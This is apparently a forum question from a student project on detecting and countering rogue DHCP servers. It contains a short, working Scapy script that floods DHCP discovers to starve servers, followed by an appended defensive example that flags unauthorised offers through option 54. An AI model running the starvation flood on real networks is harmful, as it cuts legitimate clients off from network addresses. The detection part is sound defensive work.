So for a project I'm trying to detect and mitigate rogue DHCP servers on networks. I had everything done: I created a script which constructs discovery packets (with Scapy), and if more than one response is detected, I have another script which will DoS all DHCP servers on the network with DHCP starvation, and that worked okay.
However, I met up with my project supervisor today and he told me that I should only DoS the DHCP server that is rogue, whereas my script DoSes ALL DHCP servers.
I have no idea how I would go about this. Has anyone any ideas?
```python
from scapy.all import *
from time import sleep
from threading import Thread
conf.checkIPaddr = False
pkt = Ether(src=RandMAC(), dst='ff:ff:ff:ff:ff:ff')
pkt /= IP(src='0.0.0.0', dst='255.255.255.255')
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(chaddr=RandString(12, '0123456789abcdef'))
pkt /= DHCP(options=[('message-type', 'discover'), 'end'])
sendp(pkt, loop=1)
```
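An added example, not part of the original post: telling a rogue server apart from the legitimate one comes down to reading the server identifier (option 54) in each DHCPOFFER and comparing it with an allowlist of authorised servers. The allowlist address, the function names and the sample offers are assumptions constructed for this illustration.

```python
import socket
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
AUTHORIZED_SERVERS = {"192.168.1.1"}  # assumption: known-good DHCP server(s)

def parse_dhcp(payload):
    """Return (message_type, server_id, offered_ip) from a BOOTP/DHCP UDP payload."""
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    offered_ip = socket.inet_ntoa(payload[16:20])  # yiaddr field
    msg_type, server_id, i = None, None, 240
    while i < len(payload) and payload[i] != 255:  # 255 = end option
        code = payload[i]
        if code == 0:  # pad option has no length byte
            i += 1
            continue
        if i + 1 >= len(payload) or i + 2 + payload[i + 1] > len(payload):
            raise ValueError("truncated option")
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if code == 53 and length == 1:    # DHCP message type
            msg_type = value[0]
        elif code == 54 and length == 4:  # server identifier
            server_id = socket.inet_ntoa(value)
        i += 2 + length
    return msg_type, server_id, offered_ip

def find_rogue_servers(payloads, authorized=AUTHORIZED_SERVERS):
    """Server identifiers of DHCPOFFERs (type 2) that are not on the allowlist."""
    rogue = set()
    for payload in payloads:
        msg_type, server_id, _ = parse_dhcp(payload)
        if msg_type == 2 and server_id not in authorized:
            rogue.add(server_id or "unknown")
    return sorted(rogue)

def build_offer(server_ip, offered_ip):
    """Constructed sample DHCPOFFER payload (not captured traffic)."""
    hdr = struct.pack("!BBBBIHH", 2, 1, 6, 0, 0x1234, 0, 0)
    hdr += socket.inet_aton("0.0.0.0") + socket.inet_aton(offered_ip)
    hdr += socket.inet_aton(server_ip) + socket.inet_aton("0.0.0.0")
    hdr += bytes(16 + 64 + 128)  # chaddr, sname, file
    opts = bytes([53, 1, 2, 54, 4]) + socket.inet_aton(server_ip) + b"\xff"
    return hdr + MAGIC_COOKIE + opts

SAMPLE_OFFERS = [build_offer("192.168.1.1", "192.168.1.50"),
                 build_offer("192.168.1.66", "10.0.0.5")]
```

Option 54 is filled in by whoever sends the offer, so record the frame's source MAC alongside it when logging a finding. Switch-side DHCP snooping is the usual control for blocking offers from an unlisted server.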